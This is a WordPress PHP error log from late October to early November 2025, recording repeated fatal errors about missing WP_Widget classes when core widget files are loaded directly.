[29-Oct-2025 01:47:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[29-Oct-2025 02:56:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[29-Oct-2025 03:23:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[29-Oct-2025 03:45:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[29-Oct-2025 04:27:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[29-Oct-2025 05:14:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[29-Oct-2025 05:15:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[29-Oct-2025 05:45:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[29-Oct-2025 05:51:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[29-Oct-2025 07:44:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[29-Oct-2025 07:44:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[29-Oct-2025 10:26:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[29-Oct-2025 11:02:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Oct-2025 12:52:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[29-Oct-2025 13:37:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[29-Oct-2025 13:37:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Oct-2025 14:03:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Oct-2025 14:07:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[29-Oct-2025 15:59:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[29-Oct-2025 17:36:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[29-Oct-2025 19:11:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Oct-2025 21:38:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[29-Oct-2025 22:15:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[30-Oct-2025 00:18:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Oct-2025 01:35:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[30-Oct-2025 04:32:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[30-Oct-2025 09:32:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[30-Oct-2025 10:39:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[30-Oct-2025 14:58:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[30-Oct-2025 14:58:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[30-Oct-2025 14:58:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[30-Oct-2025 14:59:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[30-Oct-2025 15:13:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[30-Oct-2025 15:13:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[30-Oct-2025 15:13:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[30-Oct-2025 15:13:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[30-Oct-2025 15:14:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[30-Oct-2025 15:14:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Oct-2025 15:14:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[30-Oct-2025 15:30:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[30-Oct-2025 15:31:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[30-Oct-2025 15:41:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[30-Oct-2025 15:41:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[30-Oct-2025 15:41:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[30-Oct-2025 15:42:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[30-Oct-2025 15:42:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[30-Oct-2025 15:42:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[30-Oct-2025 15:42:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[30-Oct-2025 15:50:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[30-Oct-2025 23:44:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[31-Oct-2025 05:52:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[31-Oct-2025 08:41:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[31-Oct-2025 17:45:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Nov-2025 00:32:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[01-Nov-2025 01:02:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[01-Nov-2025 01:07:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[01-Nov-2025 07:54:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[01-Nov-2025 11:12:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Nov-2025 03:28:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[02-Nov-2025 05:02:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Nov-2025 07:41:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Nov-2025 07:50:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Nov-2025 17:47:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Nov-2025 22:22:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Nov-2025 23:51:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Nov-2025 23:53:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[03-Nov-2025 21:32:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[04-Nov-2025 00:51:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[04-Nov-2025 01:12:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[04-Nov-2025 03:12:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[04-Nov-2025 11:22:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[04-Nov-2025 16:01:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[04-Nov-2025 16:33:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Nov-2025 22:14:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[05-Nov-2025 05:28:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[05-Nov-2025 05:52:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[05-Nov-2025 05:54:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[05-Nov-2025 07:51:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[05-Nov-2025 16:52:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[06-Nov-2025 01:16:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[06-Nov-2025 13:52:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[06-Nov-2025 21:22:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[07-Nov-2025 04:48:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[07-Nov-2025 09:25:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Nov-2025 00:00:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Nov-2025 02:06:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Nov-2025 03:28:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[08-Nov-2025 04:04:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[08-Nov-2025 04:50:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[08-Nov-2025 22:56:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[08-Nov-2025 22:57:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[09-Nov-2025 00:33:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[09-Nov-2025 03:12:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[09-Nov-2025 13:34:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[09-Nov-2025 17:49:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[10-Nov-2025 01:10:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[10-Nov-2025 10:39:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[10-Nov-2025 11:49:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
